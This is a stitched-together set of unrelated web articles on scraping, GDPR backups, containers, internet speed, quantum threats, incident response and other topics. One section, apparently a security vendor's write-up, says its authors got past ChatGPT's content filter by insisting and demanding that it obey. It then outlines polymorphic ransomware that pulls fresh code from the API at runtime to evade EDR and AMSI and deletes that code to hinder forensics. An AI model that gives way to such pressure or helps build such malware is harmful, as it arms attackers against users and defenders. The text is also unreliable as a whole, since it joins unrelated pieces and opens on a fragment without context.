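Abramson's "one message definition, per-recipient content" idea can be sketched in a few lines of Python. This is only an illustration of the concept, not the IEPPV itself: the field names, roles, and policy table below are invented, and a real IEF implementation would drive this from standardized policy vocabularies rather than a hard-coded dictionary.

```python
# Toy policy-driven redaction: one message structure, variable content per role.
POLICY = {  # field name -> roles authorized to receive it (invented for illustration)
    "position":  {"analyst", "commander"},
    "callsign":  {"analyst", "commander", "partner"},
    "source_id": {"commander"},
}

def release(message, role):
    """Redact the fields the recipient's role is not authorized to see."""
    return {k: v for k, v in message.items() if role in POLICY.get(k, set())}

msg = {"position": "45.42N 75.69W", "callsign": "RAVEN-2", "source_id": "S-117"}
print(release(msg, "partner"))    # {'callsign': 'RAVEN-2'}
print(release(msg, "commander"))  # full message
```

Note that the policy lives apart from the message and the transport, echoing Abramson's point about separating policies from the executable and managing them independently.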
The Advanced Systems Management Group experience highlights the key advantages of standards ecosystem development, as described by OMG CEO Richard Soley. Existing UML specifications helped the group replace a complex, point-to-point approach to API development with the more readily accessible development of a profile on an existing specification; the work has also simplified integration and data exchange for users, while introducing new safeguards for data. And by easing the development of best practices and standards, OMG is providing the support needed to simplify and scale the innovation process itself. As Soley noted, the aim of the working groups is to identify "the new requirements for new standards that we can deliver … that will make it easier the next time a product/solution gets built. This is really about inventing the future, rather than waiting for the future to be upon us and disrupt our businesses."
Data scraping is the process of extracting large amounts of data from publicly available web sources. The data is cleaned and prepared for processing and used by businesses for everything from lead generation and market research to consumer sentiment analysis and brand, product, and price monitoring. Because there are ethical and legal concerns around data scraping, it's important to know what's fair game and what's not. This article explains the process, techniques, and use cases for data scraping, discusses the legal and ethical ramifications, and highlights some of the more common tools.

What is Data Scraping?

Data scraping—especially on a large scale—is a complex process involving multiple stages, tools, and considerations. At a high level, data scraping refers to the act of identifying a website or other source that contains desirable information and using software to pull the target information from the site in large volumes. Sources for data can range from e-commerce sites and social media platforms to public databases and product review sites. Targeted data is usually text-based. Data scraping generally targets structured data from databases and similarly structured formats. Web scraping is a kind of data scraping that targets and extracts unstructured data from web pages.

As more businesses become reliant on data analytics for operations, business intelligence, and decision-making, the demand for both raw and processed data is on the rise. Gathering up-to-date and reliable data using traditional methods can be time-consuming and expensive—especially for smaller businesses with limited user bases. Using automated tools to "scrape" data from multiple sources, businesses can cast a wider net for the kind and amount of information they gather. There are a number of approaches to data scraping and a wide variety of tools. Depending on the use case, there are also legal and ethical concerns to keep in mind around what data is gathered and how it is used.

How Data Scraping Works

Data scraping is done using code that searches the website or other source and retrieves the sought-after information. While it's possible to write the code manually, numerous programming libraries—both free and proprietary—contain prewritten code in a number of programming languages that can be used to automate the task. The programmer defines search criteria that tell the code what to look for. The code then communicates with the targeted data source by sending requests for data, interpreting the source's responses, and sifting through those responses to pick out the data that meets the criteria. Results can include databases, spreadsheets, or plain text files, which can all be further cleaned for analysis.

Popular Data Scraping Techniques

Data can be scraped in more than one way—while no technique is outright better than another, each tends to work best in the specific scenario for which it was designed. Here's a look at some of the most popular data scraping techniques.

APIs

Application programming interfaces, or APIs, are direct bridges between online websites or applications and outside communicators. Many websites with high-density data offer free or paid access to their own integrated APIs, letting them provide data access while controlling how and how often site data is scraped. If a website or application has an API, it's best to use it over any alternative scraping method.
API access ensures consistency and reduces the risk of violating the website's terms of service (ToS). This is particularly important when scraping user-generated data on social media platforms, as some of it may be protected under personal information privacy laws and regulations.

DOM Parsing

DOM parsing makes it possible to more interactively select which elements to scrape using class names, IDs, or nested relationships. It also ensures that the relations and dynamics between the various data points aren't lost in the extraction process.

HTML Parsing

In HTML parsing, the data scraping tool reads the target web page's source code, usually written in HTML, and extracts specific data elements that might not otherwise be accessible using another technique—for example, distinguishing data based on tags, classes, and attributes. HTML parsing enables users to more easily navigate the complex structure of a website, granting access to as much data as possible and ensuring precise and reliable extraction.

Vertical Aggregation

Vertical aggregation is a specialized type of data scraping that takes a more comprehensive approach across various websites and platforms in the same niche. Instead of scraping a wide set of data once, vertical aggregation focuses data scraping efforts over a set period of time. For example, vertical aggregation could be used to scrape job listings from different employment sites, or to track changes in prices and discounts on e-commerce sites. The collected data is up-to-date and best used to support decision-making processes in niche-specific data fields.

Data Scraping Use Cases

Accurate, up-to-date data is a goldmine of knowledge and information for enterprises. Depending upon how it is processed and analyzed, it can be used for a wide range of purposes. Here are some of the most common business use cases for data scraping.

Brand, Product, and Price Monitoring

For businesses that want to keep watch over their brand and products online, as well as their competitors' brands and products, data scraping provides a high-volume means of monitoring everything from social media mentions to promotions and pricing information. Using data scraping to gather up-to-the-minute data allows them to adjust and adapt strategies in real time.

Consumer Sentiment Analysis

The success of products and services can hinge on consumer perceptions. By scraping reviews, comments, and discussions from online review sites and platforms, businesses can gauge the pulse of the consumer. Aggregating this data paints a clearer picture of overall sentiment—positive, neutral, or negative—to assist companies in refining their offerings, addressing concerns, and amplifying strengths. It acts as a feedback loop, helping brands maintain their reputation and cater better to their consumer base.

Lead Generation

Automating the extraction of data and insights from professional networks, directories, and industry-specific websites gives businesses a valuable way to find clients and customers online. This proactive approach facilitates outreach by giving sales and marketing teams a head start. Scraping massive amounts of data and running it through an analytical model enables businesses to connect with the right prospects more efficiently than manually searching for potential leads.

Market Research

Having up-to-date and relevant data is paramount to successful marketing. Data scraping lets businesses collect vast amounts of data about competitors, market trends, and consumer preferences.
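To make the HTML parsing technique above concrete, here is a minimal sketch using the requests library and Beautiful Soup (covered under tools below). The URL and CSS classes are placeholders; real pages require inspecting the markup first, and any scraper should respect the site's terms of service and robots.txt:

```python
import requests
from bs4 import BeautifulSoup

URL = "https://example.com/products"  # placeholder target

response = requests.get(URL, timeout=10)
response.raise_for_status()  # fail loudly on HTTP errors

soup = BeautifulSoup(response.text, "html.parser")

# Pick out elements by tag and class, as described above; the selectors
# assume a page structured with div.product, h2.name, and span.price.
for item in soup.select("div.product"):
    name = item.select_one("h2.name").get_text(strip=True)
    price = item.select_one("span.price").get_text(strip=True)
    print(name, price)
```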
When that scraped data is cleaned, processed, and analyzed for patterns and trends, it can provide insights that drive marketing campaigns and strategies by identifying gaps in the market and predicting upcoming trends.

Legal and Ethical Considerations of Data Scraping

Data scraping is a broad term that encompasses a lot of different techniques and use cases with varying intent. In the U.S., it's generally legal to scrape publicly available data such as job postings, reviews, and social media posts. Scraping personal data may conflict with regional or jurisdictional regulations like the European Union's General Data Protection Regulation (GDPR) and the California Consumer Privacy Act (CCPA). The definition of personal information varies depending on the policy: the GDPR restricts the processing of personal data generally, while the CCPA only covers non-publicly available data—anything made available by the government is not covered. As a general rule, it's a good idea to be cautious when scraping personal data, intellectual property, or confidential information. In addition, some websites explicitly state that they don't allow data scraping.

There are also ethical concerns about the effects of data scraping. For example, sending too many automated requests to a particular website using a data scraping tool could slow or crash the site. It could also be misconstrued or flagged as a distributed denial of service (DDoS) attack, an intentional and malicious effort to halt or disrupt traffic to a site.

Data Scraping Mitigation

Websites can employ a variety of measures to protect themselves from unauthorized data scraping outside of their dedicated API. Some of the most common include the following:

- Rate limiting—limiting certain types of network traffic to reduce strain and prevent bot activity.
- CAPTCHAs—requiring users to complete an automated test to "prove" they are a human visitor.
- Robots.txt—a text file containing instructions defining what content bots and crawlers can use and what's off limits.
- Intelligent traffic monitoring—using automated tools to monitor traffic for tell-tale bot patterns and behaviors.
- User-agent analysis—monitoring any software that tries to retrieve content from a website and blocking suspected scraping tools.
- Required authentication—not allowing access to any unauthorized user or software.
- Dynamic website content—web content that changes based on user behavior and can recognize and block scraping tools.

Data Scraping Tools

Beautiful Soup is a Python library of prepackaged open-source code that parses HTML and XML documents to extract information. It's been around since 2004 and provides a few simple methods as well as automatic encoding options.

Scrapy is another free, open-source Python framework for performing complex web scraping and crawling tasks. It can be used to extract structured data for a wide range of uses, and works for either web scraping or API scraping.

Octoparse is a free, cloud-based web scraping tool. It provides a point-and-click interface for data extraction, allowing even non-programmers to efficiently scrape data from a wide range of sites, and uses an advanced machine learning algorithm to locate data.

Parsehub is a cloud-based app that provides an easy-to-use graphical user interface, making it possible for non-programmers to intuitively find the data they want. There's a free version with limits; the standard version is $149 per month, and the Professional version costs $499 per month.
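One of the mitigations above, robots.txt, is easy for a well-behaved scraper to honor before it fetches anything. Here is a small sketch using Python's standard library; the URLs and user-agent string are placeholders:

```python
from urllib.robotparser import RobotFileParser

# Fetch and parse the site's robots.txt before scraping anything.
rp = RobotFileParser("https://example.com/robots.txt")
rp.read()

page = "https://example.com/products"
if rp.can_fetch("MyScraperBot/1.0", page):
    print("allowed to fetch", page)
else:
    print("disallowed by robots.txt -- skipping", page)
```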
Data Scraping vs. Data Crawling

Data scraping and data crawling both concern the extraction of information from websites. Data scraping focuses on extracting specific information from numerous web pages on various sites. Data crawling is a broader process, primarily used by search engines: web crawlers, also referred to as spiders, systematically scour the web to collect information about each website and web page, rather than the information contained within the pages themselves. This information is then indexed for search engine and archival purposes.

Bottom Line: What is Data Scraping?

Data analytics is increasingly critical for businesses looking for a competitive advantage, more streamlined operations, better business intelligence, and data-driven decision-making. At the same time, we're producing more data than ever before—from online shopping to social media, information about behaviors, interests, and preferences is widely available to anyone who knows where to look. Data scraping is a way for enterprises to use automated tools to cast a wide net and gather massive volumes of data that meet the specifications they define. It's useful for a wide range of purposes, and prebuilt code libraries serve as easy-to-use data scraping tools that make the process feasible for even non-technical users.

Because data scraping can involve personal information, there are legal and ethical concerns. Any enterprise data scraping effort should take regional and jurisdictional regulations into account, and should be reviewed on an ongoing basis to keep pace with changing policies. Learn more about the pros and cons of big data, of which data scraping is just one component.
The General Data Protection Regulation (GDPR) is a comprehensive data protection law that came into effect in the European Union (EU) on May 25, 2018. It aims to harmonize data protection laws across EU member states and strengthen the rights of individuals regarding their personal data. When it comes to data backup, the GDPR imposes certain requirements to ensure the protection and privacy of personal data. Organizations must understand these requirements and their impact on their data backup practices.

Under the GDPR, personal data should be processed in a manner that ensures appropriate security, including protection against unauthorized or unlawful processing, accidental loss, destruction, or damage. This means that organizations need to implement proper backup practices to safeguard personal data and ensure its availability in the event of a data breach or loss. Additionally, the GDPR introduces the right to be forgotten, which allows individuals to request the erasure of their personal data. This poses a challenge for data backup, as organizations need to be able to identify and delete personal data from backups upon request. Understanding the GDPR and its impact on data backup is crucial for organizations to ensure compliance and avoid hefty fines and reputational damage.

Proper backup practices play a vital role in ensuring the privacy and security of personal data in compliance with the GDPR. First and foremost, organizations should implement strong encryption techniques to protect backup data. Encryption ensures that even if unauthorized individuals gain access to the backup files, they won't be able to read or use the data. Regular backups should be conducted to ensure that personal data is not lost in the event of a system failure, data corruption, or cyber attack. Organizations should establish backup schedules and automate the backup process to ensure consistency and reliability.

It's important to store backup data in secure locations, both physically and digitally. Physical backups should be stored in locked cabinets or secure off-site facilities, while digital backups should be stored on encrypted drives or secure cloud storage platforms. Access controls should be in place to restrict unauthorized access to backup data: only authorized personnel should have access to backup files, and strong authentication measures should be implemented to prevent unauthorized access. By following proper backup practices, organizations can ensure the privacy and security of personal data, reducing the risk of data breaches and non-compliance with the GDPR.

Storing backup data inside the EU offers several benefits for GDPR compliance. Firstly, the GDPR restricts the transfer of personal data outside the EU unless certain conditions are met. By storing backup data within the EU, organizations can ensure compliance with these restrictions and avoid potential legal issues. Storing backup data within the EU also enhances data protection: the EU has strict data protection laws and regulations in place, which ensure that personal data is processed and stored securely. By aligning backup practices with these laws, organizations can enhance the privacy and security of personal data. Another benefit of storing backup data inside the EU is proximity to the data source. In the event of a data breach or loss, organizations can quickly restore the backup data and minimize the impact on business operations.
Overall, storing backup data inside the EU not only helps organizations comply with the GDPR but also provides enhanced data protection and faster data recovery.

When it comes to GDPR compliance, choosing the right backup solutions is crucial. Firstly, organizations should consider backup solutions that offer strong encryption capabilities, ensuring that backup data remains protected even if it falls into the wrong hands. Furthermore, organizations should select backup solutions that provide granular recovery options. This enables them to easily locate and restore specific files or data elements, which is essential for responding to data subject requests and complying with the right to be forgotten. It's also important to choose backup solutions that offer robust access controls and audit trails. These features help organizations monitor and control access to backup data, ensuring compliance with the GDPR's security requirements. By carefully evaluating and selecting the right backup solutions, organizations can ensure GDPR compliance while effectively protecting and managing their backup data.

Implementing data backup strategies in line with GDPR requirements means following best practices. First and foremost, organizations should conduct a thorough data inventory and mapping exercise to identify all personal data they hold, where it is stored, and how it is processed. This helps in understanding the scope of backup requirements and ensuring that all personal data is properly backed up. Organizations should also establish clear retention and deletion policies for backup data. These policies should align with the GDPR's principles of storage limitation and the right to erasure: backup data that is no longer required should be securely deleted to avoid unnecessary data storage and potential non-compliance.

Regular testing and validation of backup procedures is essential to ensure the availability and integrity of backup data. Organizations should conduct periodic backup tests to verify that backup files are complete, accessible, and can be successfully restored. It's also important to regularly review and update backup strategies to adapt to changing business needs and GDPR requirements; organizations should stay informed about any updates or changes to the GDPR and adjust their backup practices accordingly. By following these best practices, organizations can implement data backup strategies that align with GDPR requirements and ensure the effective protection and availability of personal data.
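As a concrete illustration of the encryption guidance above, here is a minimal Python sketch using the third-party cryptography package. It is only a sketch: the file names are placeholders, and in practice the hard part is key management. The key must live in a vault or HSM with its own access controls, not beside the backup.

```python
from cryptography.fernet import Fernet

# Generate a symmetric key once and store it securely (vault/HSM), not on disk.
key = Fernet.generate_key()
fernet = Fernet(key)

# Encrypt a backup archive before it leaves the host.
with open("backup.tar", "rb") as f:
    ciphertext = fernet.encrypt(f.read())

with open("backup.tar.enc", "wb") as f:
    f.write(ciphertext)

# Restore path: fernet.decrypt(ciphertext) returns the original bytes.
```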
In this video from the Blue Waters 2018 Symposium, Tiziana Di Matteo from Carnegie Mellon University presents: Massive Galaxies and Black Holes at the Cosmic Dawn.

"The first billion years is a pivotal time for cosmic structure formation. The galaxies and black holes that form then shape and influence all future generations of stars and black holes. Understanding and detecting the first galaxies and black holes is therefore one of the main observational and theoretical challenges in galaxy formation."

Tiziana Di Matteo is a pioneer in the study of the early universe, black holes and computer simulations of galaxy formation. Her simulations, which are among the largest to be completed, were the first to incorporate black hole physics. Her more than 40 peer-reviewed papers have received more than 1,000 citations by other scientists. Her findings have been published in peer-reviewed journals such as Nature, The Astrophysical Journal and Monthly Notices of the Royal Astronomical Society. Di Matteo's research has been featured in PBS's NOVA, Astronomy Magazine, Science News, MSNBC Science and Technology and the Pittsburgh Post-Gazette.
Containers are Virtual Machines After All

Many a nerd has thrown punches over the question of whether containers (e.g. Docker, LXC, etc.) are actually virtual machines. The conventional wisdom is that although containers are similar to virtual machines, they're fundamentally different. I beg to differ.

Are containers virtual machines or not? There's a common analogy that VMs are like houses and containers are like apartments. And you are the application. When you live in a house, you have free rein to do as you please. When you live in an apartment, you have to share certain spaces, and parts of the building are off-limits. Interestingly, this analogy suggests that the difference between containers and VMs is not one of architecture but of implementation! Apartment buildings and houses both have rooms, water, electricity, roofs, and doors. Containers and VMs both virtualize compute, storage, networking, and memory. So what's the difference, really?

Shared Almost Nothing

Those who say that a container is not a virtual machine are quick to note that all containers on a host share the same kernel. Not a copy of the same kernel, but the exact same kernel running on the host. Virtual machines, on the other hand, have completely isolated kernels. If you're running 100 identical Linux VMs, each VM has its own unique copy of the same kernel. You can upgrade the kernel in one, and it doesn't affect any others. That seems like a pretty significant difference. But let's look a little deeper.

Containers do use virtualization, but rather than fully virtualizing compute, network, storage, and memory, containers do something a little different. They fully virtualize the compute and networking portions. Storage and memory, on the other hand, are mostly but not completely virtualized. The kernel is stored on the host, and the container is given read-only access to it. The rest of a container's storage and memory are virtualized. In a container, the operating system is necessarily separated from the rest of the VM. But that hardly means containers aren't VMs.

VMs that Look Like Containers?

With a little tweaking, a traditional virtual machine could meet the criteria of a container. One could, for example, create a shared, read-only filesystem containing a Linux kernel and have multiple VMware virtual machines booting from it. As those VMs boot, VMware could identify the duplicate virtual memory blocks and deduplicate them. Those VMs wouldn't cease to be virtual machines just because they're all sharing a kernel. Let's take a more realistic example: multiple virtual machines booting Kali Linux from a shared, read-only ISO. Each VM has its own virtual disk for persistence, but the operating system kernel is shared. Is that a container?

Containers Were Born On Linux

There's a reason containers were born on Linux and not Windows. The Linux architecture lends itself to the clean separation of the kernel from everything else. Windows, on the other hand, just mashes it all together. That's why Windows and *nix went in opposite directions. To get more efficient use of system resources, FreeBSD got jails, and Linux got OpenVZ, LXC, and eventually Docker. Windows, on the other hand, went straight to full-on x86 virtualization.

Containers Mimic Physical Machines

As I said in an earlier post, virtualization is mimicry. Containers present applications with compute, memory, storage, and networking, and control how applications can use those resources. Virtual machines do the exact same thing.
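The shared-kernel claim is easy to check empirically. Here is a small Python sketch; it assumes a Linux host with Docker installed and the alpine image available:

```python
import subprocess

def stdout_of(cmd):
    """Run a command and return its stdout, stripped."""
    return subprocess.run(cmd, capture_output=True, text=True).stdout.strip()

host_kernel = stdout_of(["uname", "-r"])
container_kernel = stdout_of(["docker", "run", "--rm", "alpine", "uname", "-r"])

print("host:     ", host_kernel)
print("container:", container_kernel)
# On a Linux host the two strings match: the container runs on the host's
# kernel, whereas a VM booted from an ISO would report its own kernel version.
```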
Not only that: you can start, stop, pause, and shut down containers, just like VMs! At this point, it's starting to become clear that the earlier analogy – VMs being like houses – is flawed. Virtual machines aren't like houses per se, but like buildings in general. Containers are a particular implementation of virtual machine, like an apartment is a particular instance of a building.

Containers Aren't Those VMs

Let me be clear that I'm not suggesting that people who say containers aren't VMs are wrong. When people say containers aren't VMs, they're trying to explain that a container is not the kind of virtual machine you'd find in VMware or Hyper-V. It's not the type of VM you attach an ISO to, boot up, and install an operating system on. It's perfectly valid to insist that containers are not those types of virtual machines because, well, they're not. They're very different. My goal here is to highlight the similarities so that the differences become more apparent.

Also, I'm not saying containers are bad. Far from it. I've been using Docker since 2014 and I love it. And I'm excited to see how Docker for Windows Server will fare. Application virtualization has been a holy grail of Windows for a long time, and Docker just might finally deliver it.
Downloading is anytime that you request files from somewhere else on the internet and deliver them to your computer; this happens constantly, like whenever you view a webpage (such as this one!). Uploading is anytime that you send files from your computer to somewhere else on the web, such as when posting a family photo to Facebook or sending an email. You are both uploading and downloading whenever you do a Zoom or Skype call, since you're viewing video from others and sending them your own video.

Both upload and download are always calculated as some amount of data per second. Since data itself is measured in units called "bits" and "bytes", your internet speed is calculated this way as well. File sizes for anything from emails to pictures to videos all begin with individual bytes and work upward from there, to kilobytes (KB), megabytes (MB) and gigabytes (GB), each step roughly a thousand times larger than the last. Connection speeds, on the other hand, are measured in bits per second, and since there are eight bits in a byte, a megabyte of data takes eight times longer to move than a megabit. That's why, when you're looking up internet speeds with your internet service provider (ISP), you'll usually see Mbps or Gbps listed as the measurement. If your ISP can provide 50 Mbps (fifty megabits per second), then that's considered the speed of your internet.

What Is Broadband?

As defined by the Federal Communications Commission (FCC), a broadband internet connection must have a certain minimum speed. This is currently set at 25 Mbps (25 megabits per second) for downloads, and 3 Mbps (3 megabits per second) for uploads. Fiber internet is another type, and its speeds can go lightning fast, reaching or even exceeding 1 Gbps — aka, 1,000 Mbps.

From this starting point of broadband, we can quickly gauge whether a certain person or business has a good internet speed. One important point to remember is that there are several factors that can ultimately affect your personal internet speed and upload/download performance. For instance, the more devices that are connected to a single internet connection, the slower that connection will generally be. There's simply not enough bandwidth to process all those data requests at the same time. When this happens, it's almost exactly like a bottleneck of traffic on the highway. When a road with four lanes gets temporarily closed down to just one lane due to an accident or construction, all the cars are forced to use the same lane and slow down. This is the same principle as having a bunch of different computers or other devices connected to one internet connection, whether at home or at work.

In addition to broadband, there are other types of internet offered, including satellite internet. The problem with satellite internet is that the speed and performance you get will not match up to broadband (even if the Mbps offered is actually higher!) due to technical factors called "latency" and "packet jitter". Don't worry about the terms themselves; just know that you're much better off with broadband or fiber internet than with satellite internet.

What Is a Fast Internet Speed? What Is a Slow Internet Speed?

With all that in mind, we can take a look at what is considered a "fast" or "slow" internet speed, depending on its relation to standard broadband. If your business gets internet that is a lot faster than the typical broadband connection we discussed above, then this is usually regarded as fast internet. On the other hand, if your internet speed is below those normal broadband connection limits, then that would generally be considered slow internet.
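A quick Python sketch makes the byte-to-bit arithmetic described earlier concrete, and shows why the same file feels so different at different speeds (the file size and speeds are just examples):

```python
def transfer_seconds(file_size_mb, speed_mbps):
    """Time to move a file: megabytes are converted to megabits (x8)."""
    return file_size_mb * 8 / speed_mbps

photo_mb = 5  # a typical smartphone photo

# 600 kbps, the broadband upload and download minimums, and 1 Gbps fiber:
for speed in (0.6, 3, 25, 1000):
    print(f"{photo_mb} MB at {speed} Mbps: {transfer_seconds(photo_mb, speed):.2f} s")

# 5 MB at 0.6 Mbps: 66.67 s   <- roughly the "about 1 minute" quoted below
# 5 MB at 3 Mbps: 13.33 s
# 5 MB at 25 Mbps: 1.60 s
# 5 MB at 1000 Mbps: 0.04 s
```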
Of course, not all "fast" internet is created equal, and fast internet speeds can range pretty widely themselves. Further, you have to consider both upload and download separately, since the speeds for each one vary as well. Let's take a look at all these factors that go into a good internet speed.

What Difference Does a Good Internet Speed Make?

Generally speaking, if you have speeds of 10 Mbps or higher, that's typically considered a good internet speed, because it allows for most common internet activity. If you have a good internet speed and connection, your experience on the internet will be much better, more enjoyable, and involve less waiting time for files to send or videos to buffer. Here are a few examples of internet activity and how much speed you need for it, with cases for both upload and download (in order, from least to greatest):

- Instagram posting usually only requires uploading a photo of about 2-5 megabytes. This would take you about 1 minute on a 600 kbps uplink.
- YouTube videos can be streamed online at just 500 Kbps download speed, which is less than even the minimum for broadband.
- Zoom has certain minimum requirements for streaming high-quality video calls: 1 Mbps (upload) / 600 kbps (download).
- Netflix has a minimum speed requirement of roughly 3 Mbps download speed for standard definition streaming and 5 Mbps for high definition (HD). This is higher than the simpler activities above because of the file sizes of HD video.

These are just a few examples, but the vast majority of your activity online will fall somewhere in the range above, from Instagram (small photos) to Netflix (HD videos), with some requiring even less (like simple email), and very few requiring more. As mentioned above, 10 Mbps download speed would be more than enough for all of these activities, and it is offered widely across the United States. In fact, most ISPs offer much higher than this in all but the most rural or remote locations. However, if you don't have at least a standard broadband connection, your internet activity could become very difficult and frustrating, especially if you're trying to conduct business.

Take a Speed Test

If you're curious whether your internet speed is up to par, or if you want to know how long a certain size file will take to download, there are speed tests and calculators available online for free. To determine your exact internet speed right now, you can use SpeedTest.net. This website has been around for a long time and is trusted by millions of people to figure out their internet speed. To figure out how long a certain file will take to download, simply enter the speed from the test above, along with the file size, into Omnicalculator's bandwidth calculator, which will instantly give you the answer in time required to download.

Good Internet Speed Matters

As you can see, having a good internet speed matters. If you're struggling with your internet service speeds or you simply want someone to inspect your existing infrastructure, then you're in the right place. Give us a call or email at Bristeeri today, and we'll get your internet issues squared away and get you back to your work and your life in no time.
By now, you have probably heard or read about – if not used – ChatGPT and are blown away by everything it can do. If you haven't, let's bring you up to speed. ChatGPT is a popular AI-based program used to generate dialogues. It's taken the world by storm and changed how people see and use AI. While an online tool, its creator OpenAI has stated that ChatGPT doesn't have internet connectivity and can't query or read anything online. Instead, it is trained on a massive dataset and, as a result, cannot provide up-to-date responses to queries. It's also important to note that although ChatGPT will try to answer anything, the program is said to have built-in content filters preventing it from answering questions regarding subjects that could be problematic. But is that really the case? Let's unpack this a little further and look at the technology's potential malicious uses.

Bypassing the Content Filter

Content filters are common in large language model chatbots. They are often applied to restrict access to certain content types or protect users from potentially harmful or inappropriate material. We wanted to see whether cyber-criminals could maliciously use ChatGPT, so we asked the chatbot for malicious code. As expected, our request was refused and the content filter was triggered. More often than not, though, chatbots have blind spots. ChatGPT isn't any different; we just needed to find them.

Our first goal was to find a way to bypass the content filter. We managed it by insisting and demanding. Interestingly, by asking ChatGPT to do the same thing under multiple constraints and telling it to obey, we received functional code. We can then use ChatGPT to mutate this code, creating multiple variations of it. It's important to note here that when using the API, the ChatGPT system doesn't seem to apply its content filter. In fact, one of the powerful capabilities of ChatGPT from a cyber perspective is the ability to easily create and continually mutate injectors. By continuously querying the chatbot and receiving a unique piece of code each time, it is possible to create a polymorphic program that is highly evasive and difficult to detect. Let's examine this with the typical use case of malware and ransomware behavior.

A Four-Step Process

Our approach centers around acquiring malicious code, validating its functionality and executing it immediately. It follows this process:

Get: A short request for working code is enough to find the files that ransomware might want to encrypt. Once found, similar code can be used to read the files and encrypt them. So far, we have seen that ChatGPT can provide the necessary code for typical ransomware, including code injection and file encryption modules.

Where? The primary disadvantage of this approach is that once the malware is present on the target machine, it is composed of clearly malicious code. This makes it susceptible to detection by security software such as antivirus, endpoint detection and response (EDR), or anti-malware scanning interfaces. The detection can be bypassed by utilizing the ChatGPT API within the malware itself, on-site. To accomplish this, the malware includes a Python interpreter (taking Python as an example), which periodically queries ChatGPT for new modules that perform malicious actions. This allows the malware to receive incoming payloads in the form of text instead of binaries.
Additionally, by requesting specific functionality such as code injection, file encryption or persistence, we can easily obtain new code or modify existing code. This results in polymorphic malware that doesn't exhibit malicious behavior at rest and often does not contain suspicious logic while in memory. The high level of adaptability achieved makes the malware highly evasive to security products that rely on signature-based detection. It can also bypass measures such as the Antimalware Scan Interface (AMSI), as it eventually executes and runs Python code.

Validate and Execute: Validation of the functionality of the code received from ChatGPT can be achieved by establishing validation scenarios for the different actions the code is supposed to perform. Doing so allows the malware authors to be sure the generated code is operational and can be trusted to accomplish its intended task. This proactive step ensures the reliability of the code. The final step in our process is executing the code received from ChatGPT. By using native functions, this malware can execute the received code on multiple platforms. On top of that, as a measure of caution, the malware could choose to delete the received code, making forensic analysis more challenging.

There's More to Come

As we have seen, the malicious use of ChatGPT's API within malware can present significant challenges for security professionals. This is not just a hypothetical scenario but a very real concern. This is a field that is constantly evolving, and as such, it's essential to stay informed and vigilant. As users learn how to best arrange their queries for the best results, we can anticipate the bot becoming smarter and more powerful. Like previous AI models, ChatGPT will likely become more skilled the longer it is in operation and the more cyber-related queries and information it encounters. With cyber-criminals looking for new and improved ways to trick and attack people and businesses, it's important to be vigilant and ensure your security stack is watertight and covers all bases.
Anatomy of a quantum attack (QuantumXchange)

April Burghardt of Quantum Xchange authored a recent essay on cyberattacks. IQT-News summarizes for our readers:

Advanced computers, quantum being one, have the potential to wreak havoc on the data, systems, devices, and networks we rely on daily. A conventional computer would need 300 trillion years to break RSA encryption – considered the gold standard for public key encryption (PKE). A quantum computer will be able to do it in 10 seconds!

Research by the Organization of American States found cyberattacks against critical infrastructure and manufacturing are more likely to target industrial control systems than steal data. More than half (54 percent) of the 500 critical infrastructure suppliers surveyed reported attempts to take control of systems, while 40 percent said they had experienced attempts to shut down systems entirely. While most assume cyberattacks will be launched using conventional, binary computers, imagine the catastrophic consequences of a large-scale quantum attack on critical infrastructure. In the hands of the enemy, a quantum computer capable of destroying RSA-encrypted data would have devastating effects on our critical infrastructure and economy. It's no different than the fear of conventional warfare going nuclear. Yet we know adversaries are stealing our encrypted data, waiting for the day a quantum computer can break its encryption – an attack known as harvesting.

Another area ripe for exploitation by cybercriminals and state-sponsored actors is space. Whether exploited by military groups or criminal gangs, attacks on satellites, their systems, and base stations on Earth are seeing a steady uptick. More than 4,000 satellites are currently orbiting Earth, with thousands more planned for launch by private industry, the likes of SpaceX, Amazon, OneWeb and others. While this lowered barrier to entry increases innovation and discovery, it also increases the number of potential access points for hackers. Keeping space technology infrastructure and communications safe is a growing concern of the U.S. government. Legislation proposed by U.S. Representatives Ted Lieu and Ken Calvert aims to classify space as critical infrastructure to boost public-private collaboration on cybersecurity matters.

As the Information Age gives way to the Quantum Age of computing, it will require the largest global cryptographic transition in the history of computing. NATO, the U.S. government, the EU and other global institutions and governments around the world are preparing now for quantum attacks, or Y2Q – the day a quantum computer breaks encryption. The White House has taken a leading role, recently issuing NSM-8, a national security memorandum that builds on the original Executive Order 14028, issued on May 12, 2021, to improve the nation's cybersecurity and protect federal government networks.

Tune into QuantumXchange's latest on-demand webinar, Assessing the True Threat and Potential Damage of Quantum Computing Cyberattacks, for a better understanding of quantum attacks.

Sandra K. Helsel, Ph.D. has been researching and reporting on frontier technologies since 1990. She has her Ph.D. from the University of Arizona.
How do you swiftly counter and recover from cybersecurity incidents, for example phishing attacks? Mastery of the incident response lifecycle is crucial. This article explores each critical phase—preparation, detection, analysis, containment, eradication, recovery, and post-incident review—to guide you through a tactical approach to threat management. Learn the strategies that fortify defences and streamline recovery to minimise disruption from cyber attacks.

Are you monitoring the dark web?

- The NIST incident response lifecycle, for example (there are others), offers a structured approach integral to managing and mitigating cybersecurity incidents, comprising stages such as preparation, detection, containment, eradication, recovery, and post-event activities.
- A thorough incident response plan and a trained, ready incident response team are essential for effective crisis management, involving regular training, phishing simulation exercises, and understanding the roles of team members.
- Post-incident reviews are critical and should involve lessons learned meetings, detailed incident documentation, and continuous improvement of the incident response plan to address weaknesses and refine strategies to counter future incidents.

Understanding the Incident Response Lifecycle

The NIST incident response lifecycle serves as a deliberate process to handle and lessen the impact of cybersecurity incidents. It is a structured approach that includes several stages, namely preparation; detection and analysis; containment, eradication, and recovery; and post-event activity. This structured approach is also known as the incident response process. The National Institute of Standards and Technology (NIST) outlines this process in four primary stages: preparation, detection/analysis, containment/eradication, and recovery, referred to as the NIST incident response process and the associated NIST incident response lifecycle.

A well-planned lifecycle offers a methodical structure for spotting and reacting to security threats, thereby lessening the effects of cyber incidents. It facilitates the strategic detection and management of attacks within organisations using incident response procedures, thus improving cybersecurity practices.

The Importance of a Well-Defined Lifecycle

An organised incident response lifecycle plays a significant role in reducing downtime. By facilitating prompt and efficient action against threats as soon as an incident occurs (a ransomware attack, for example), it minimises the impact of the incident and decreases recovery time. It also aids in managing the aftermath of a security breach and mitigating future risks, thereby reducing potential losses.

Enhancing the overall security posture of an organisation is crucial in minimising the impact of cybersecurity incidents and strengthening the organisation's ability to withstand future incidents. A well-structured incident response lifecycle contributes to this by enabling efficient identification and management of these incidents, thereby improving security strategies and resilience.

Key Components of the Incident Response Lifecycle

The key elements of the incident response lifecycle encompass:

- Preparation
